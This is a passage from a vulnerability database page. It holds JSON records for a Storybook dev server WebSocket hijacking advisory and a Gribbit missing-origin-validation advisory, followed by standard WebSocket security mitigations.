the exploitable functionality was introduced in 8.1, the patch has been applied to 7.x as a precautionary measure given the underlying WebSocket behaviour.\n\n### Recommended actions\nUpdate to one of the patched versions: `7.6.23`, `8.6.17`, `9.1.19`, `10.2.10`.",
"id": "GHSA-mjf5-7g4m-gx5w",
"modified": "2026-02-26T15:16:10Z",
"published": "2026-02-26T15:16:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/storybookjs/storybook/security/advisories/GHSA-mjf5-7g4m-gx5w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27148"
},
{
"type": "WEB",
"url": "https://github.com/storybookjs/storybook/commit/0affdf928bd6fafbadfb1dfe22ce6104805e10e8"
},
{
"type": "WEB",
"url": "https://github.com/storybookjs/storybook/commit/54689a8add18ea75d628c540f4bc677592a1e685"
},
{
"type": "WEB",
"url": "https://github.com/storybookjs/storybook/commit/b8cfa77c73940c140acdcd8a06ab1ea913c44761"
},
{
"type": "WEB",
"url": "https://github.com/storybookjs/storybook/commit/d34085f39c647f5c23c3a3b2d197c18602fcf876"
},
{
"type": "PACKAGE",
"url": "https://github.com/storybookjs/storybook"
},
{
"type": "WEB",
"url": "https://github.com/storybookjs/storybook/releases/tag/v10.2.10"
},
{
"type": "WEB",
"url": "https://github.com/storybookjs/storybook/releases/tag/v7.6.23"
},
{
"type": "WEB",
"url": "https://github.com/storybookjs/storybook/releases/tag/v8.6.17"
},
{
"type": "WEB",
"url": "https://github.com/storybookjs/storybook/releases/tag/v9.1.19"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Storybook Dev Server is Vulnerable to WebSocket Hijacking"
}
GHSA-MQMF-9G99-4JVX
Vulnerability from github – Published: 2023-01-09 21:30 – Updated: 2023-01-13 21:30A vulnerability was found in lukehutch Gribbit. It has been classified as problematic. Affected is the function messageReceived of the file src/gribbit/request/HttpRequestHandler.java. The manipulation leads to missing origin validation in websockets. The name of the patch is 620418df247aebda3dd4be1dda10fe229ea505dd. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217716.
{
"affected": [],
"aliases": [
"CVE-2014-125071"
],
"database_specific": {
"cwe_ids": [
"CWE-1385",
"CWE-346"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-09T21:15:00Z",
"severity": "CRITICAL"
},
"details": "A vulnerability was found in lukehutch Gribbit. It has been classified as problematic. Affected is the function messageReceived of the file src/gribbit/request/HttpRequestHandler.java. The manipulation leads to missing origin validation in websockets. The name of the patch is 620418df247aebda3dd4be1dda10fe229ea505dd. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217716.",
"id": "GHSA-mqmf-9g99-4jvx",
"modified": "2023-01-13T21:30:28Z",
"published": "2023-01-09T21:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-125071"
},
{
"type": "WEB",
"url": "https://github.com/lukehutch/gribbit/commit/620418df247aebda3dd4be1dda10fe229ea505dd"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.217716"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.217716"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Enable CORS-like access restrictions by verifying the 'Origin' header during the WebSocket handshake.
Mitigation
Use a randomized CSRF token to verify requests.
Mitigation
Use TLS to securely communicate using 'wss' (WebSocket Secure) instead of 'ws'.
Mitigation
Require user authentication prior to the WebSocket connection being established. For example, the WS library in Node has a 'verifyClient' function.
Mitigation
Leverage rate limiting to prevent against DoS. Use of the leaky bucket algorithm can help with this.
Mitigation
Use a library that provides restriction of the payload size. For example, WS library for Node includes 'maxPayloadoption' that can be set.
Mitigation
Treat data/input as untrusted in both directions and apply the same data/input sanitization as XSS, SQLi, etc.
No CAPEC attack patterns related to this CWE.